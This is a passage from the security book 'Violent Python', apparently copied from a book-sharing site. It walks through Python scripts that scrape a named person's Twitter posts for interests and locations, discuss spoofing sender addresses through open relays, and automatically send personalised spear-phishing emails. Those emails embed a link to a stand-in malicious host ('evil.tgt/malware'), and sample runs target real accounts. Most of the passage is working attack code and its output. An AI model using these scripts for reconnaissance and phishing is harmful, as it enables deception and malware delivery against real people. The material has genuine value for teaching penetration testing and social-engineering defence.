Violent Python: A Cookbook for Hackers, Forensic Analysts, Penetration Testers and Security Engineers (29 page)

Parsing Interests from Twitter Using Regular Expressions

Next we will gather a target’s interests, whether those interests are other users or Internet content. Any time a website presents an opportunity to learn what a target cares about, jump at it, as that data will form the basis of a successful social-engineering attack. As discussed earlier, the points of interest in a tweet are any links included, hash tags and other Twitter users mentioned. Finding this information will be a simple exercise in regular expressions.

 import json

 import re

 import urllib

 import urllib2

 import optparse

 from anonBrowser import ∗

 def get_tweets(handle):

   query = urllib.quote_plus(‘from:’ + handle+\

    ‘ since:2009-01-01 include:retweets’)

   tweets = []

 browser = anonBrowser()

   browser.anonymize()

  response = browser.open(‘
http://search.twitter.com/
’+\

    ‘search.json?q=’ + query)

   json_objects = json.load(response)

   for result in json_objects[’results’]:

     new_result = {}

     new_result[’from_user’] = result[’from_user_name’]

     new_result[’geo’] = result[’geo’]

     new_result[’tweet’] = result[’text’]

     tweets.append(new_result)

   return tweets

 def find_interests(tweets):

   interests = {}

   interests[’links’] = []

   interests[’users’] = []

   interests[’hashtags’] = []

   for tweet in tweets:

     text = tweet[’tweet’]

     links = re.compile(‘(http.∗?)\Z|(http.∗?) ‘)\

      .findall(text)

     for link in links:

       if link[0]:

       link = link[0]

      elif link[1]:

       link = link[1]

      else:

       continue

      try:

       response = urllib2.urlopen(link)

       full_link = response.url

       interests[’links’].append(full_link)

      except:

       pass

     interests[’users’] += re.compile(‘(@\w+)’).findall(text)

     interests[’hashtags’] +=\

      re.compile(‘(#\w+)’).findall(text)

   interests[’users’].sort()

   interests[’hashtags’].sort()

   interests[’links’].sort()

   return interests

 def main():

   parser = optparse.OptionParser(‘usage%prog ‘+\

     ‘-u ’)

   parser.add_option(‘-u’, dest=’handle’, type=’string’,\

    help=’specify twitter handle’)

   (options, args) = parser.parse_args()

   handle = options.handle

   if handle == None:

     print parser.usage

     exit(0)

   tweets = get_tweets(handle)

   interests = find_interests(tweets)

   print ‘\n[+] Links.’

   for link in set(interests[’links’]):

     print ‘ [+] ‘ + str(link)

   print ‘\n[+] Users.’

   for user in set(interests[’users’]):

     print ‘ [+] ‘ + str(user)

   print ‘\n[+] HashTags.’

   for hashtag in set(interests[’hashtags’]):

     print ‘ [+] ‘ + str(hashtag)

 if __name__ == ‘__main__’:

   main()

Running our interest parsing script, we see it parses out the links, users, and hashtags for our target, mixed martial arts fighter Chael Sonnen. Notice that it returns a youtube video, some users, and hash tags for an upcoming fight against current (as of June 2012) UFC Champion Anderson Silva. Curiosity again gets the best of us wondering how that will turn out.

 recon:∼# python twitterInterests.py -u sonnench

 [+] Links.

 [+]
http://www.youtube.com/watch?v=K-BIuZtlC7k&feature=plcp

 [+] Users.

  [+] @tomasseeger

  [+] @sonnench

  [+] @Benaskren

  [+] @AirFrayer

  [+] @NEXERSYS

 [+] HashTags.

  [+] #UFC148

The use of regular expressions here is not the optimal method for finding information. The regular expression to grab links included in the text will miss certain types of URLs, because it is very difficult to match all possible URLs with a regular expression. However, for our purposes, this regular expression will work 99 percent of the time. Additionally, the function uses the urllib2 library to open links instead of our anonBrowser class.

Again, we will use a dictionary to sort the information into a more manageable data structure so that we don’t have to create a whole new class. Due to Twitter’s character limit, most URLs are shortened using one of many services. These links are not very informative, because they could point to anywhere. In order to expand them, they are opened using urllib2; after the script opens the page, urllib can retrieve the full URL. Other users and hashtags are then retrieved using very similar regular expressions, and the results are returned to the master twitter() method. The locations and interests are finally returned to the caller outside of the class.

Other things can be done to expand the capabilities of our methods of handling Twitter. The virtually limitless resources found on the Internet and the myriad of ways to analyze that data require the constant expansion of capabilities in automated information-gathering program.

Wrapping up our entire series of recon against a Twitter user, we make a class to scrape location, interests, and tweets. This will prove useful, as you’ll see in the next section.

 import urllib

 from anonBrowser import ∗

 import json

 import re

 import urllib2

 class reconPerson:

   def __init__(self, handle):

    self.handle = handle

    self.tweets = self.get_tweets()

   def get_tweets(self):

    query = urllib.quote_plus(‘from:’ + self.handle+\

     ‘ since:2009-01-01 include:retweets’

 )

    tweets = []

    browser = anonBrowser()

    browser.anonymize()

   response = browser.open(‘
http://search.twitter.com/
’+\

     ‘search.json?q=’ + query)

    json_objects = json.load(response)

    for result in json_objects[’results’]:

      new_result = {}

      new_result[’from_user’] = result[’from_user_name’]

      new_result[’geo’] = result[’geo’]

      new_result[’tweet’] = result[’text’]

      tweets.append(new_result)

    return tweets

   def find_interests(self):

    interests = {}

    interests[’links’] = []

    interests[’users’] = []

    interests[’hashtags’] = []

    for tweet in self.tweets:

      text = tweet[’tweet’]

      links = re.compile(‘(http.∗?)\Z|(http.∗?) ‘).findall(text)

      for link in links:

      if link[0]:

       link = link[0]

      elif link[1]:

       link = link[1]

      else:

       continue

      try:

      response = urllib2.urlopen(link)

      full_link = response.url

      interests[’links’].append(full_link)

      except:

      pass

    interests[’users’] +=\

     re.compile(‘(@\w+)’).findall(text)

    interests[’hashtags’] +=\

     re.compile(‘(#\w+)’).findall(text)

    interests[’users’].sort()

    interests[’hashtags’].sort()

    interests[’links’].sort()

    return interests

   def twitter_locate(self, cityFile):

    cities = []

    if cityFile != None:

     for line in open(cityFile).readlines():

      city = line.strip(‘\n’).strip(‘\r’).lower()

      cities.append(city)

    locations = []

    locCnt = 0

    cityCnt = 0

    tweetsText = ’’

    for tweet in self.tweets:

     if tweet[’geo’] != None:

      locations.append(tweet[’geo’])

      locCnt += 1

     tweetsText += tweet[’tweet’].lower()

    for city in cities:

     if city in tweetsText:

      locations.append(city)

      cityCnt += 1

    return locations

Anonymous Email

More and more frequently, websites are beginning to require their users to create and log in to accounts if they want access to the best resources of that site. This will obviously present a problem, as browsing the Internet remains very different for our browser than for a traditional Internet user. The requirement
to log in obviously destroys the option for total anonymity on the Internet, as any action performed after logging in will be tied to the account. Most websites only require a valid email address and do not check the validity of other personal information entered. Email addresses from online providers like Google or Yahoo are free and easy to sign up for; however, they come with a terms of service that you must accept and understand.

One great alternative to having a permanent email is to use a disposable email account. Ten Minute Mail from
http://10minutemail.com/10MinuteMail/index.html
provides an example of such a disposable email account. An attacker can use email accounts that are difficult to trace in order to create social media accounts that are also not tied to them. Most websites have at the very minimum a “terms of use” document that disallows the gathering of information on other users. While actual attackers do not follow these rules, applying these techniques to personal accounts demonstrates the capability fully. Remember, though, that the same process can be used against you, and you should take steps to make sure that your account is safe from such actions.

Mass Social Engineering

Up to this point, we have gathered a large amount of valuable information accumulating a well-rounded view of the given target. Crafting an email automatically with this information can be a tricky exercise, especially with the goal of adding enough detail to make it believable. One option at this point would be to have the program present all of the information it has and then quit: this would allow the attacker to then personally craft an email using all of the available information. However, manually sending an email to each person in a large organization is unfeasible. The power of Python allows us to automate the process and gain results quickly. For our purposes, we will create a very simple email using the information gathered and automatically send it to our target.

Using Smtplib to Email Targets

The process of sending an email normally involves opening one’s client of choice, clicking new, and then clicking send. Behind the scenes, the client connects to the server, possibly logs in, and exchanges information detailing the sender, recipient, and the other necessary data. The Python library, smtplib, will handle this process in our program. We will go through the process of creating a Python email client to use to send our malicious emails to our target. This client will be very basic but will make sending emails simpler for the rest of our program. For our purposes here, we’ll use the Google Gmail SMTP server; you will need to create a Google Gmail account to use this script or modify the settings to use your own SMTP server.

 import smtplib

 from email.mime.text import MIMEText

 def sendMail(user,pwd,to,subject,text):

   msg = MIMEText(text)

   msg[’From’] = user

   msg[’To’] = to

   msg[’Subject’] = subject

   try:

    smtpServer = smtplib.SMTP(‘smtp.gmail.com’, 587)

    print “[+] Connecting To Mail Server.”

    smtpServer.ehlo()

    print “[+] Starting Encrypted Session.”

    smtpServer.starttls()

    smtpServer.ehlo()

    print “[+] Logging Into Mail Server.”

    smtpServer.login(user, pwd)

    print “[+] Sending Mail.”

    smtpServer.sendmail(user, to, msg.as_string())

    smtpServer.close()

    print “[+] Mail Sent Successfully.”

   except:

    print “[-] Sending Mail Failed.”

 user = ‘username’

 pwd = ‘password’

 sendMail(user, pwd, ‘[email protected]’,\

  ‘Re: Important’, ‘Test Message’)

Running the script and checking the target’s inbox, we see it successfully sends an email using Python’s smtplib.

 recon:# python sendMail.py

 [+] Connecting To Mail Server.

 [+] Starting Encrypted Session.

 [+] Logging Into Mail Server.

 [+] Sending Mail.

 [+] Mail Sent Successfully.

Given a valid email server and parameters, this client will correctly send an email to to_addr. Many email servers, however, are not open relays, and so will only deliver mail to specific addresses. A local email server set up as an open relay, or any open relay on the Internet, will send email to any address and from any
address—the from address does not even have to be valid. Spammers use this same technique to send email from
[email protected]:
they simply spoof the from address. As people will rarely open email from a suspicious address in this day and age, our ability to spoof the from address is key. Using the client class and an open relay enables an attacker to send an email from an apparently trustworthy address, increasing the probability it will be clicked on by the target.

Spear Phishing with Smtplib

We are finally at the stage at which all of our research comes together. Here, the script creates an email that looks like it comes from the target’s friend, has things that the target will find interesting, and flows as if it was written by a real person. A great deal of research has gone into helping computers communicate as though they were people, and the various techniques are still not perfect. In order to mitigate this possibility, we will create a very simple message that contains our payload in the email. Several parts of the program will involve choosing which piece of information to include. Our program will randomly make these choices based on the data it has. The steps to take are: choose the fake sender’s email address, craft a subject, create the message body, and then send the email. Luckily creating the sender and subject is fairly straightforward.

This code becomes a matter of carefully handling if-statements and how the sentences come together to form a short, coherent message. When dealing with the possibility of a huge amount of data, as would be the case if our reconnaissance code used more sources, each piece of the paragraph would probably be broken into individual methods. Each method would be responsible for having its piece of the pie begin and end a certain way, and then would operate independently of the rest of the code. That way, as more information about someone’s interests (for example) was learned, only that method would be changed. The last step is sending the email via our email client and then trusting human stupidity to do the rest. Part of this process, and one not discussed in this chapter, is the creation of whatever exploit or phishing site will be used to gain access. In our example, we simply send a misnamed link, but the payload could be an attachment or a scam website, or any other method an attacker desired. This process would then be repeated for every member of the organization, and it only takes one person to fall for the trap to grant access to an attacker.

Our specific script will target a user based on the information they leave publically accessible via Twitter. Based on what it finds about locations, users, hashtags, and links, it will craft an email with a malicious link for the user to click.

 #!/usr/bin/python

 # -∗- coding: utf-8 -∗-

 import smtplib

 import optparse

 from email.mime.text import MIMEText

 from twitterClass import ∗

 from random import choice

 def sendMail(user,pwd,to,subject,text):

   msg = MIMEText(text)

   msg[’From’] = user

   msg[’To’] = to

   msg[’Subject’] = subject

   try:

    smtpServer = smtplib.SMTP(‘smtp.gmail.com’, 587)

    print “[+] Connecting To Mail Server.”

    smtpServer.ehlo()

    print “[+] Starting Encrypted Session.”

    smtpServer.starttls()

    smtpServer.ehlo()

    print “[+] Logging Into Mail Server.”

    smtpServer.login(user, pwd)

    print “[+] Sending Mail.”

    smtpServer.sendmail(user, to, msg.as_string())

    smtpServer.close()

    print “[+] Mail Sent Successfully.”

   except:

    print “[-] Sending Mail Failed.”

 def main():

   parser = optparse.OptionParser(‘usage%prog ‘+\

    ‘-u -t ‘+\

    ‘-l -p ’)

   parser.add_option(‘-u’, dest=’handle’, type=’string’,\

    help=’specify twitter handle’)

   parser.add_option(‘-t’, dest=’tgt’, type=’string’,\

    help=’specify target email’)

   parser.add_option(‘-l’, dest=’user’, type=’string’,\

    help=’specify gmail login’)

   parser.add_option(‘-p’, dest=’pwd’, type=’string’,\

    help=’specify gmail password’)

   (options, args) = parser.parse_args()

   handle = options.handle

   tgt = options.tgt

   user = options.user

   pwd = options.pwd

   if handle == None or tgt == None\

    or user ==None or pwd==None:

     print parser.usage

     exit(0)

   print “[+] Fetching tweets from: “+str(handle)

   spamTgt = reconPerson(handle)

   spamTgt.get_tweets()

   print “[+] Fetching interests from: “+str(handle)

   interests = spamTgt.find_interests()

   print “[+] Fetching location information from: “+\

    str(handle)

   location = spamTgt.twitter_locate(‘mlb-cities.txt’)

   spamMsg = “Dear “+tgt+”,”

   if (location!=None):

    randLoc=choice(location)

    spamMsg += “ Its me from “+randLoc+”.”

   if (interests[’users’]!=None):

    randUser=choice(interests[’users’])

    spamMsg += “ “+randUser+” said to say hello.”

   if (interests[’hashtags’]!=None):

    randHash=choice(interests[’hashtags’])

    spamMsg += “ Did you see all the fuss about “+\

     randHash+”?”

   if (interests[’links’]!=None):

    randLink=choice(interests[’links’])

    spamMsg += “ I really liked your link to: “+\

     randLink+”.”

  spamMsg += “ Check out my link to
http://evil.tgt/malware

   print “[+] Sending Msg: “+spamMsg

   sendMail(user, pwd, tgt, ‘Re: Important’, spamMsg)

 if __name__ == ‘__main__’:

   main()

Testing our script, we see if we can gain some information about the Boston Red Sox from their Twitter account in order to send a malicious spam email.

 recon# python sendSpam.py -u redsox -t target@tgt -l username -p password

 [+] Fetching tweets from: redsox

 [+] Fetching interests from: redsox

 [+] Fetching location information from: redsox

[+] Sending Msg: Dear redsox, Its me from toronto. @davidortiz said to say hello. Did you see all the fuss about #SoxAllStars? I really liked your link to:
http://mlb.mlb.com
. Check out my link to
http://evil.tgt/malware

 [+] Connecting To Mail Server.

 [+] Starting Encrypted Session.

 [+] Logging Into Mail Server.

 [+] Sending Mail.

 [+] Mail Sent Successfully.

Other books

Bright Before Us by Katie Arnold-Ratliff
Modern Lovers by Emma Straub
The Bell Ringers by Henry Porter
Black British by Hebe de Souza
A Rendezvous to Die For by McMahon, Betty
The Blue Bedspread by Raj Kamal Jha
THE PRIME MINISTER by DAVID SKILTON
A Plague of Poison by Maureen Ash